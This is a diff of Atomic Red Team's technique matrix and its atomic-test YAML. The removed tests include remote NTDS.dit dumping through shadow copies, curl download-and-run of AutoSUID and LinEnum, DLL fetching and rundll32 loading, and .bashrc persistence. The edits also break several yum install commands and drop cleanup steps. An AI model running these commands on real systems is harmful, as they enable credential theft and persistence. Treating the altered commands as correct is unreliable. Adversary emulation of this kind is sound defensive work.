-|  | [Python](../../T1059.006/T1059.006.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | [Multi-hop Proxy](../../T1090.003/T1090.003.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [Python](../../T1059.006/T1059.006.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Scheduled Task](../../T1053.005/T1053.005.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) |  | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) |  | Man in the Browser [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -121,7 +121,7 @@
 |  |  |  |  | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rogue Domain Controller](../../T1207/T1207.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rootkit](../../T1014/T1014.md) |  |  |  |  |  |  |  |
-|  |  |  |  | [Run Virtual Instance](../../T1564.006/T1564.006.md) |  |  |  |  |  |  |  |
+|  |  |  |  | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rundll32](../../T1218.011/T1218.011.md) |  |  |  |  |  |  |  |
 |  |  |  |  | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -24,7 +24,7 @@
 |  | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Software Discovery](../../T1518/T1518.md) |  | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Man in the Browser [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
-|  | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Multi-hop Proxy](../../T1090.003/T1090.003.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Windows Management Instrumentation](../../T1047/T1047.md) | [Domain Account](../../T1136.002/T1136.002.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | [Screen Capture](../../T1113/T1113.md) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -90,7 +90,7 @@
 |  |  |  |  | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rogue Domain Controller](../../T1207/T1207.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | [Run Virtual Instance](../../T1564.006/T1564.006.md) |  |  |  |  |  |  |  |
+|  |  |  |  | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rundll32](../../T1218.011/T1218.011.md) |  |  |  |  |  |  |  |
 |  |  |  |  | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -4401,45 +4401,6 @@ credential-access:
      executor:
        command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}

-'
-        name: command_prompt
-        elevation_required: true
-    - name: Create Volume Shadow Copy remotely (WMI) with esentutl
-      auto_generated_guid: 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
-      description: |
-        This test is intended to be run from a remote workstation with domain admin context.
-        The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
-      supported_platforms:
-      - windows
-      input_arguments:
-        source_path:
-          description: File to shadow copy
-          type: String
-          default: c:\windows\ntds\ntds.dit
-        target_path:
-          description: Target path of the result file
-          type: String
-          default: c:\ntds.dit
-        target_host:
-          description: IP Address / Hostname you want to target
-          type: String
-          default: localhost
-      dependencies:
-      - description: 'Target must be a reachable Domain Controller, and current context
-          must be domain admin
-
-'
-        prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief
-
-'
-        get_prereq_command: 'echo Sorry, can''t connect to target host, check: network,
-          firewall or permissions (must be admin on target)
-
-'
-      executor:
-        command: 'wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe
-          /y /vss #{source_path} /d #{target_path}"
-
 '
        name: command_prompt
        elevation_required: true
@@ -4609,7 +4570,7 @@ credential-access:
          -v tshark)" ]; then exit 1; else exit 0; fi;

 '
-        get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
+        get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which
          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
      executor:
        command: |
@@ -4639,7 +4600,7 @@ credential-access:
          -v tshark)" ]; then exit 1; else exit 0; fi;

 '
-        get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
+        get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which
          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
      executor:
        command: "sudo tcpdump -c 5 -nnni #{interface}    \nif [ -x \"$(command -v
@@ -7891,7 +7852,7 @@ collection:

 '
        get_prereq_command: |
-          (which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip)
+          (which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip)
          echo Please set input_files argument to include files that exist
      executor:
        name: sh
@@ -7997,8 +7958,8 @@ collection:
          ]; then exit 1; fi;

 '
-        get_prereq_command: "(which yum && yum -y install epel-release zip gpg)||(which
-          apt-get && apt-get install -y zip gpg)\n"
+        get_prereq_command: "(which yum && yum -y epel-release zip gpg)||(which apt-get
+          && apt-get install -y zip gpg)\n"
      executor:
        name: sh
        elevation_required: false
@@ -20120,12 +20081,9 @@ privilege-escalation:
        command_to_add:
          description: Command to add to the .bash_profile file
          type: String
-          default: echo "Hello from Atomic Red Team T1546.004"
+          default: "/path/to/script.py"
      executor:
-        command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
-
-'
-        cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bash_profile
+        command: 'echo "#{command_to_add}" >> ~/.bash_profile

 '
        name: sh
@@ -20141,12 +20099,9 @@ privilege-escalation:
        command_to_add:
          description: Command to add to the .bashrc file
          type: String
-          default: echo "Hello from Atomic Red Team T1546.004"
+          default: "/path/to/script.py"
      executor:
-        command: 'echo ''#{command_to_add}'' >> ~/.bashrc
-
-'
-        cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bashrc
+        command: 'echo "#{command_to_add}" >> ~/.bashrc

 '
        name: sh
@@ -25682,8 +25637,8 @@ defense-evasion:
        package_installer:
          description: Package installer command for linux. Default yum
          type: String
-          default: "(which yum && yum -y install epel-release rsyslog)||(which apt-get
-            && apt-get install -y rsyslog)"
+          default: "(which yum && yum -y epel-release rsyslog)||(which apt-get &&
+            apt-get install -y rsyslog)"
        flavor_command:
          description: Command to disable syslog collection. Default newer rsyslog
            commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog
@@ -36210,65 +36165,7 @@ defense-evasion:
      - Linux
      - macOS
      - Windows
-      identifier: T1564.006
-    atomic_tests:
-    - name: Register Portable Virtualbox
-      auto_generated_guid: c59f246a-34f8-4e4d-9276-c295ef9ba0dd
-      description: "ransomware payloads via virtual machines (VM). \n[Maze ransomware](https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/)\n"
-      supported_platforms:
-      - windows
-      input_arguments:
-        msi_file_path:
-          description: Path to the MSI file
-          type: Path
-          default: PathToAtomicsFolder\T1564.006\bin\Virtualbox_52.msi
-        cab_file_path:
-          description: Path to the CAB file
-          type: Path
-          default: PathToAtomicsFolder\T1564.006\bin\common.cab
-      dependency_executor_name: powershell
-      dependencies:
-      - description: 'MSI file must exist on disk at specified location (#{msi_file_path})
-
-'
-        prereq_command: 'if (Test-Path #{msi_file_path}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{msi_file_path}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}"
-      - description: 'CAB file must exist on disk at specified location (#{cab_file_path})
-
-'
-        prereq_command: 'if (Test-Path #{cab_file_path}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: "New-Item -Type Directory (split-path #{cab_file_path})
-          -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab\"
-          -OutFile \"#{cab_file_path}\" \n"
-      - description: 'Old version of Virtualbox must be installed
-
-'
-        prereq_command: 'if (Test-Path "C:\Program Files\Oracle\VirtualBox\VboxC.dll")
-          {exit 0} else {exit 1}
-
-'
-        get_prereq_command: 'msiexec /i #{msi_file_path} /qn
-
-'
-      executor:
-        command: |
-          "C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe" /reregserver
-          regsvr32 /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
-          rundll32 "C:\Program Files\Oracle\VirtualBox\VBoxRT.dll,RTR3Init"
-          sc create VBoxDRV binpath= "C:\Program Files\Oracle\VirtualBox\drivers\VboxDrv.sys" type= kernel start= auto error= normal displayname= PortableVBoxDRV
-          sc start VBoxDRV
-        cleanup_command: |
-          sc stop VBoxDRV
-          sc delete VBoxDRV
-          regsvr32 /u /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
-          msiexec /x #{msi_file_path} /qn
-        name: command_prompt
+    atomic_tests: []
  T1218.011:
    technique:
      id: attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5
@@ -36541,71 +36438,7 @@ defense-evasion:
 '
      executor:
        name: powershell
-        command: 'rundll32.exe #{input_file}, StartW
-
-'
-    - name: Rundll32 with Ordinal Value
-      auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
-      description: "Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer.
-        \nUpon successful execution, Calc.exe will spawn.\n"
-      supported_platforms:
-      - windows
-      input_arguments:
-        input_url:
-          description: Url to download the DLL
-          type: Url
-          default: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll
-        input_file:
-          description: DLL File
-          type: String
-          default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll
-      dependency_executor_name: powershell
-      dependencies:
-      - description: 'DLL file must exist on disk at specified location
-
-'
-        prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
-
-'
-      executor:
-        name: command_prompt
-        command: 'rundll32.exe #{input_file},#2
-
-'
-    - name: Rundll32 with Control_RunDLL
-      auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e
-      description: "Rundll32.exe loading dll with 'control_rundll' within the command-line,
-        loading a .cpl or another file type related to CVE-2021-40444. \n"
-      supported_platforms:
-      - windows
-      input_arguments:
-        input_url:
-          description: Url to download the DLL
-          type: Url
-          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
-        input_file:
-          description: DLL File
-          type: String
-          default: PathToAtomicsFolder\T1047\bin\calc.dll
-      dependency_executor_name: powershell
-      dependencies:
-      - description: 'DLL file must exist on disk at specified location
-
-'
-        prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
-
-'
-      executor:
-        name: command_prompt
-        command: 'rundll32.exe shell32.dll,Control_RunDLL #{input_file}
-
-'
+        command: 'rundll32.exe #{input_file}, StartW'
  T1134.005:
    technique:
      external_references:
@@ -37523,43 +37356,6 @@ defense-evasion:
        command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name}
          -ModulePath #{module_path}'
        name: powershell
-    - name: DiskShadow Command Execution
-      auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa
-      description: 'Emulates attack with a DiskShadow.exe (LOLBIN installed by default
-        on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
-
-'
-      supported_platforms:
-      - windows
-      input_arguments:
-        txt_payload:
-          description: txt to execute
-          type: Path
-          default: PathToAtomicsFolder\T1218\src\T1218.txt
-        dspath:
-          description: Default location of DiskShadow.exe
-          type: Path
-          default: C:\Windows\System32\diskshadow.exe
-      dependency_executor_name: powershell
-      dependencies:
-      - description: txt file must exist on disk at specified location (#{txt_payload})
-        prereq_command: 'if (Test-Path #{txt_payload}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
-      - description: DiskShadow.exe must exist on disk at specified location (#{dspath})
-        prereq_command: 'if (Test-Path #{dspath}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: 'echo "DiskShadow.exe not found on disk at expected location"
-
-'
-      executor:
-        command: "#{dspath} -S #{txt_payload} \n"
-        name: powershell
-        elevation_required: false
  T1216:
    technique:
      id: attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe
@@ -50695,12 +50491,9 @@ persistence:
        command_to_add:
          description: Command to add to the .bash_profile file
          type: String
-          default: echo "Hello from Atomic Red Team T1546.004"
+          default: "/path/to/script.py"
      executor:
-        command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
-
-'
-        cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bash_profile
+        command: 'echo "#{command_to_add}" >> ~/.bash_profile

 '
        name: sh
@@ -50716,12 +50509,9 @@ persistence:
        command_to_add:
          description: Command to add to the .bashrc file
          type: String
-          default: echo "Hello from Atomic Red Team T1546.004"
+          default: "/path/to/script.py"
      executor:
-        command: 'echo ''#{command_to_add}'' >> ~/.bashrc
-
-'
-        cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bashrc
+        command: 'echo "#{command_to_add}" >> ~/.bashrc

 '
        name: sh
@@ -51977,8 +51767,8 @@ impact:
        prereq_command: 'which_gpg=`which gpg`

 '
-        get_prereq_command: "(which yum && yum -y install epel-release gpg)||(which
-          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n"
+        get_prereq_command: "(which yum && yum -y epel-release gpg)||(which apt-get
+          && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n"
      executor:
        name: bash
        elevation_required: false
@@ -52063,8 +51853,8 @@ impact:
          which_ccencrypt=`which ccencrypt`
          which_ccdecrypt=`which ccdecrypt`
          if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi
-        get_prereq_command: "(which yum && yum -y install epel-release ccrypt)||(which
-          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)\n"
+        get_prereq_command: "(which yum && yum -y epel-release ccrypt)||(which apt-get
+          && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)\n"
      executor:
        name: bash
        elevation_required: false
@@ -55622,16 +55412,6 @@ discovery:

 '
        name: sh
-      dependency_executor_name: sh
-      dependencies:
-      - description: 'check if lsof exists
-
-'
-        prereq_command: 'which lsof
-
-'
-        get_prereq_command: "(which yum && yum -y install lsof)||(which apt-get &&
-          DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)\n"
    - name: Show if a user account has ever logged in remotely
      auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110
      description: 'Show if a user account has ever logged in remotely
@@ -55988,8 +55768,8 @@ discovery:
          fi;

 '
-        get_prereq_command: "(which yum && yum -y install epel-release nmap)||(which
-          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n"
+        get_prereq_command: "(which yum && yum -y epel-release nmap)||(which apt-get
+          && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n"
      executor:
        command: |
          nmap -sS #{network_range} -p #{port}
@@ -56146,8 +55926,8 @@ discovery:
        package_installer:
          description: Package installer command. Debian - apt install samba
          type: String
-          default: "(which yum && yum -y install epel-release samba)||(which apt-get
-            && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)"
+          default: "(which yum && yum -y epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive
+            apt-get install -y samba)"
      dependency_executor_name: bash
      dependencies:
      - description: 'Package with smbstatus (samba) must exist on device
@@ -56331,7 +56111,7 @@ discovery:
          -v tshark)" ]; then exit 1; else exit 0; fi;

 '
-        get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
+        get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which
          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
      executor:
        command: |
@@ -56361,7 +56141,7 @@ discovery:
          -v tshark)" ]; then exit 1; else exit 0; fi;

 '
-        get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
+        get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which
          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
      executor:
        command: "sudo tcpdump -c 5 -nnni #{interface}    \nif [ -x \"$(command -v
@@ -57237,34 +57017,6 @@ discovery:

 '
        name: sh
-    - name: Enumerate domain computers within Active Directory using DirectorySearcher
-      auto_generated_guid: 962a6017-1c09-45a6-880b-adc9c57cb22e
-      description: "This test is a Powershell script that enumerates Active Directory
-        to determine computers that are joined to the domain. \nThis test is designed
-        to mimic how SessionGopher can determine the additional systems within a domain,
-        which has been used before by threat actors to aid in lateral movement. \nReference:
-        [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks).
-        \nUpon successful execution, this test will output the names of the computers
-        that reside on the domain to the console window. \n"
-      supported_platforms:
-      - windows
-      dependency_executor_name: powershell
-      dependencies:
-      - description: This PC must be joined to a domain.
-        prereq_command: "if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain
-          -eq $true) {exit 0} else {exit 1}\t\t"
-        get_prereq_command: 'write-host "This PC must be manually added to a domain." '
-      executor:
-        command: |
-          $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
-          $DirectorySearcher.PropertiesToLoad.Add("Name")
-          $Computers = $DirectorySearcher.findall()
-          foreach ($Computer in $Computers) {
-            $Computer = $Computer.Properties.name
-            if (!$Computer) { Continue }
-            Write-Host $Computer}
-        name: powershell
-        elevation_required: false
  T1518.001:
    technique:
      id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384
@@ -66152,73 +65904,6 @@ execution:

 '
        name: sh
-    - name: Harvest SUID executable files
-      auto_generated_guid: 46274fc6-08a7-4956-861b-24cbbaa0503c
-      description: "AutoSUID application is the Open-Source project, the main idea
-        of which is to automate harvesting the SUID executable files and to find a
-        way for further escalating the privileges. \n"
-      supported_platforms:
-      - linux
-      input_arguments:
-        autosuid:
-          description: Path to the autosuid shell script
-          type: Path
-          default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
-        autosuid_url:
-          description: Path to download autosuid shell script
-          type: Url
-          default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
-      dependency_executor_name: bash
-      dependencies:
-      - description: 'AutoSUID must exist on disk at specified location (#{autosuid})
-
-'
-        prereq_command: 'if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
-
-'
-        get_prereq_command: 'curl #{autosuid_url} --output #{autosuid}
-
-'
-      executor:
-        command: |
-          chmod +x #{autosuid}
-          bash #{autosuid}
-        name: sh
-    - name: LinEnum tool execution
-      auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
-      description: 'LinEnum is a bash script that performs discovery commands for
-        accounts,processes, kernel version, applications, services, and uses the information
-        from these commands to present operator with ways of escalating privileges
-        or further exploitation of targeted host.
-
-'
-      supported_platforms:
-      - linux
-      input_arguments:
-        linenum:
-          description: Path to the LinEnum shell script
-          type: Path
-          default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
-        linenum_url:
-          description: Path to download LinEnum shell script
-          type: Url
-          default: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
-      dependency_executor_name: bash
-      dependencies:
-      - description: 'LinnEnum must exist on disk at specified location (#{linenum})
-
-'
-        prereq_command: 'if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
-
-'
-        get_prereq_command: 'curl #{linenum_url} --output #{linenum}
-
-'
-      executor:
-        command: |
-          chmod +x #{linenum}
-          bash #{linenum}
-        name: sh
  T1204:
    technique:
      object_marking_refs:
@@ -70900,81 +70585,7 @@ command-and-control:
      - macOS
      - Windows
      - Network
-      identifier: T1090.003
-    atomic_tests:
-    - name: Psiphon
-      auto_generated_guid: 14d55ca0-920e-4b44-8425-37eedd72b173
-      description: |
-        Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you
-        with uncensored access to Internet.
-        This process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands.
-        More information can be found about Psiphon using the following urls
-        http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html
-        https://psiphon.ca/faq.html
-      supported_platforms:
-      - windows
-      dependency_executor_name: powershell
-      dependencies:
-      - description: 'The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
-
-'
